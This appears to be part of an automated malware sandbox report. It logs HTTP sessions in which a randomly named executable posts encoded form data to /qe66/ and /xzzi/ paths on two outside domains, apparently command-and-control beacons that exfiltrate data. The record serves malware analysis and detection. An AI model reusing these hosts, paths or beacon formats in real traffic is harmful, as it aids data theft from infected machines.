                Data Ascii: AZOTcfex=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
                Aug 23, 2024 04:18:43.215931892 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:43 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.4 | 49738 | 217.160.0.106 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:18:45.111944914 CEST | 816 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 66 5a 59 4c 32 4d 45 6f 61 4c 63 35 6f 76 70 5a 4c 38 31 6f 56 6e 4f 43 4e 72 78 69 44 30 61 6d 73 4f 34 54 37 4e 42 45 6e 72 72 51 61 44 6f 37 71 46 4d 75 64 78 37 67 4a 62 61 31 75 50 6a 76 2b 6d 51 59 52 6f 6c 79 4f 43 72 54 7a 2f 45 4e 44 52 32 71 31 6f 77 67 44 4b 79 2b 47 75 71 6d 43 56 52 48 53 38 67 54 58 79 38 79 48 37 35 49 76 45 46 71 4b 42 69 46 30 6c 4b 50 44 5a 41 54 45 7a 4c 35 47 70 4c 50 62 5a 4c 53 33 7a 65 39 74 47 59 44 6a 6a 46 61 58 6c 73 79 65 52 6e 4b 2f 32 4a 59 4e 52 32 45 4b 6a 79 72 51 3d
                Data Ascii: AZOTcfex=QlHrfpSPDgxfD/U+TGlA5CBCH3wy+6+VdlZmMMguL4fZYL2MEoaLc5ovpZL81oVnOCNrxiD0amsO4T7NBEnrrQaDo7qFMudx7gJba1uPjv+mQYRolyOCrTz/ENDR2q1owgDKy+GuqmCVRHS8gTXy8yH75IvEFqKBiF0lKPDZATEzL5GpLPbZLS3ze9tGYDjjFaXlsyeRnK/2JYNR2EKjyrQ=
                Aug 23, 2024 04:18:45.757328987 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:45 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                3 | 192.168.2.4 | 49739 | 217.160.0.106 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:18:47.762895107 CEST | 10898 | OUT | POST /qe66/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.catherineviskadi.com
                Origin: http://www.catherineviskadi.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.catherineviskadi.com/qe66/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 51 6c 48 72 66 70 53 50 44 67 78 66 44 2f 55 2b 54 47 6c 41 35 43 42 43 48 33 77 79 2b 36 2b 56 64 6c 5a 6d 4d 4d 67 75 4c 34 58 5a 59 36 57 4d 45 4c 43 4c 64 35 6f 76 6b 35 4c 68 31 6f 56 41 4f 43 46 76 78 69 50 6b 61 67 77 4f 35 78 7a 4e 52 67 4c 72 38 41 61 44 6e 62 71 49 52 2b 63 7a 37 67 5a 66 61 31 2b 50 6a 76 2b 6d 51 61 4a 6f 6c 6a 4f 43 70 54 7a 34 4d 74 44 4e 37 4b 31 41 77 67 37 38 79 36 62 62 72 51 79 56 53 6e 43 38 77 78 50 79 2b 53 48 44 34 49 76 4d 46 71 48 62 69 42 55 54 4b 50 32 32 41 52 59 7a 50 76 48 41 59 63 66 65 63 78 6d 31 41 66 63 69 63 43 58 69 42 4b 54 67 6f 6a 47 36 31 4f 33 43 54 4b 63 4e 69 46 57 38 70 38 63 4e 69 50 53 38 2f 70 6c 66 55 44 56 69 4a 4a 57 52 4e 65 5a 4a 34 68 2b 43 4d 56 4c 32 47 6b 76 57 62 75 51 57 34 68 7a 72 48 44 4b 50 52 47 7a 71 2b 4e 7a 78 4d 65 59 6d 66 73 64 36 36 49 5a 2b 4a 74 64 42 66 4a 57 7a 7a 72 43 4d 63 32 49 67 6c 49 41 59 44 4c 75 4e 69 4c 69 73 47 39 36 72 77 55 69 4b 31 4f 31 4e 64 72 2b 5a 54 56 65 54 41 [TRUNCATED]
                Data Ascii: AZOTcfex=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 [TRUNCATED]
                Aug 23, 2024 04:18:48.408241034 CEST | 580 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:48 GMT
                Server: Apache
                Content-Encoding: gzip
                Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                4 | 192.168.2.4 | 49740 | 217.160.0.106 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:18:50.297837019 CEST | 518 | OUT | GET /qe66/?AZOTcfex=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.catherineviskadi.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:18:51.068322897 CEST | 770 | IN | HTTP/1.1 404 Not Found
                Content-Type: text/html
                Content-Length: 626
                Connection: close
                Date: Fri, 23 Aug 2024 02:18:50 GMT
                Server: Apache
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                5 | 192.168.2.4 | 49742 | 208.91.197.27 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:12.550000906 CEST | 790 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 205
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 35 39 72 66 31 37 61 31 55 4f 5a 4d 67 47 38 38 71 50 57 30 74 56 59 38 77 6e 46 75 57 76 5a 6f 63 31 2b 36 77 2b 43 4c 4c 58 74 7a 67 2f 31 58 4c 56 69 70 4a 2f 34 48 56 58 2f 4d 67 67 48 48 68 4d 4a 75 6b 52 76 6d 51 4a 70 46 4c 67 5a 72 7a 6b 4f 4a 63 62 68 34 34 76 67 78 64 64 51 30 68 38 52 59 6c 33 68 50 66 30 53 41 58 4a 37 56 50 6b 4c 37 64 30 41 75 61 67 62 77 64 44 57 34 4b 34 53 46 6e 37 54 52 75 6b 74 6b 79 76 53 49 37 38 45 54 44 4c 72 77 45 67 4b 5a 55 48 57 71 63 4e 61 63 4d 38 76 73 75 5a 2b 48 6b 42 51 71 69 61 4d 62 6a 67 3d 3d
                Data Ascii: AZOTcfex=wA7ycEIu+ovI59rf17a1UOZMgG88qPW0tVY8wnFuWvZoc1+6w+CLLXtzg/1XLVipJ/4HVX/MggHHhMJukRvmQJpFLgZrzkOJcbh44vgxddQ0h8RYl3hPf0SAXJ7VPkL7d0AuagbwdDW4K4SFn7TRuktkyvSI78ETDLrwEgKZUHWqcNacM8vsuZ+HkBQqiaMbjg==


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                6 | 192.168.2.4 | 49743 | 208.91.197.27 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:15.078872919 CEST | 810 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 225
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 78 6f 63 55 4f 36 78 2f 43 4c 49 58 74 7a 31 50 31 53 50 56 69 33 4a 2f 38 50 56 53 48 4d 67 67 44 48 68 4a 31 75 6b 41 76 35 52 5a 70 44 44 41 5a 74 33 6b 4f 4a 63 62 68 34 34 76 46 55 64 5a 30 30 68 50 5a 59 33 69 56 4d 57 55 53 44 57 4a 37 56 59 55 4c 2f 64 30 41 51 61 68 33 4b 64 42 75 34 4b 35 69 46 67 75 7a 53 68 6b 74 6d 76 2f 54 47 71 74 74 39 47 2b 4f 42 50 42 71 36 61 46 65 71 51 72 4c 47 64 4e 4f 37 38 5a 61 30 35 47 5a 65 76 5a 78 53 34 76 78 43 4e 4e 47 72 33 70 4b 4e 43 74 54 4b 49 56 45 42 77 76 73 3d
                Data Ascii: AZOTcfex=wA7ycEIu+ovI7dbfmMO1FeY+lG88kfWvtVU8wmB+W5xocUO6x/CLIXtz1P1SPVi3J/8PVSHMggDHhJ1ukAv5RZpDDAZt3kOJcbh44vFUdZ00hPZY3iVMWUSDWJ7VYUL/d0AQah3KdBu4K5iFguzShktmv/TGqtt9G+OBPBq6aFeqQrLGdNO78Za05GZevZxS4vxCNNGr3pKNCtTKIVEBwvs=


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                7 | 192.168.2.4 | 49744 | 208.91.197.27 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:17.611164093 CEST | 10892 | OUT | POST /xzzi/ HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Accept-Encoding: gzip, deflate, br
                Host: www.bfiworkerscomp.com
                Origin: http://www.bfiworkerscomp.com
                Cache-Control: max-age=0
                Connection: close
                Content-Type: application/x-www-form-urlencoded
                Content-Length: 10305
                Referer: http://www.bfiworkerscomp.com/xzzi/
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Data Raw: 41 5a 4f 54 63 66 65 78 3d 77 41 37 79 63 45 49 75 2b 6f 76 49 37 64 62 66 6d 4d 4f 31 46 65 59 2b 6c 47 38 38 6b 66 57 76 74 56 55 38 77 6d 42 2b 57 35 4a 6f 63 6d 71 36 78 63 36 4c 4a 58 74 7a 70 66 31 54 50 56 6a 79 4a 37 51 4c 56 54 36 78 67 69 4c 48 67 72 4e 75 7a 45 7a 35 66 70 70 44 63 51 5a 73 7a 6b 4f 51 63 62 78 30 34 76 31 55 64 5a 30 30 68 4a 39 59 6e 48 68 4d 61 30 53 41 58 4a 37 5a 50 6b 4c 48 64 30 4a 72 61 68 43 39 64 31 61 34 4c 5a 79 46 69 64 62 53 6f 6b 74 67 73 2f 53 62 71 74 78 2b 47 36 76 2b 50 42 65 41 61 48 43 71 54 64 6a 61 48 39 36 50 76 49 71 59 37 32 78 4f 72 4a 34 54 37 38 78 58 4e 63 36 63 69 74 50 75 41 2f 71 68 66 67 55 77 70 36 2f 35 62 34 5a 41 73 69 49 33 61 68 79 32 58 59 43 6c 73 75 59 6f 4c 52 57 38 47 58 6c 66 46 4a 51 69 52 57 39 4a 42 69 71 48 4b 61 6f 4b 36 49 77 39 7a 4b 71 64 6a 72 44 57 31 5a 46 4b 44 54 57 43 7a 4d 71 62 39 6e 64 65 54 6b 62 65 41 51 75 41 45 6c 51 49 6e 44 6a 34 73 45 77 49 37 71 45 71 51 45 6f 2f 34 30 48 74 4c 52 34 63 50 45 43 49 74 [TRUNCATED]
                Data Ascii: AZOTcfex=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 [TRUNCATED]


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                8 | 192.168.2.4 | 49745 | 208.91.197.27 | 80 | 2412 | C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Timestamp | Bytes transferred | Direction | Data
                Aug 23, 2024 04:19:20.144239902 CEST | 516 | OUT | GET /xzzi/?bB7L5=DPt0-rQpMXpt&AZOTcfex=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4= HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.bfiworkerscomp.com
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                Aug 23, 2024 04:19:22.188949108 CEST | 1236 | IN | HTTP/1.1 200 OK
                Date: Fri, 23 Aug 2024 02:18:59 GMT
                Server: Apache
                Referrer-Policy: no-referrer-when-downgrade
                Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                Set-Cookie: vsid=932vr471925139712582222; expires=Wed, 22-Aug-2029 02:18:59 GMT; Max-Age=157680000; path=/; domain=www.bfiworkerscomp.com; HttpOnly
                X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_T89Q0gHGpMP7mo/WWLv0ADyoZNeD0EOxMU5E2VVsmfffFN+HGhsqQpLGOVsK9Rz7y6CtQD/0t0jS9hElvCU4qA==
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Connection: close
                Data Raw: 61 31 66 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65
                Data Ascii: a1ff<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.ne
                Aug 23, 2024 04:19:22.188982010 CEST | 1236 | IN | Data Raw: 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69
                Data Ascii: t"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" i
                Aug 23, 2024 04:19:22.188999891 CEST | 1236 | IN | Data Raw: 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d 22 62 6f 6f 6c 65 61 6e 22 29 7b 6a 3d 74 72 75 65 7d 69 66 28 6a 26 26 74 79 70 65 6f 66 28 63 6d 70 5f 67 65 74 6c 61 6e 67 2e 75 73 65 64 6c 61 6e 67 29 3d 3d 22 73 74 72 69 6e
                Data Ascii: tion(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c=[];var f=location.hash;var e=location.search;var a="languag
                Aug 23, 2024 04:19:22.189014912 CEST | 1236 | IN | Data Raw: 67 75 61 67 65 73 22 20 69 6e 20 68 29 7b 66 6f 72 28 76 61 72 20 71 3d 30 3b 71 3c 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 2e 6c 65 6e 67 74 68 3b 71 2b 2b 29 7b 69 66 28 68 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75
                Data Ascii: guages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}function x(i,e){var w="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash
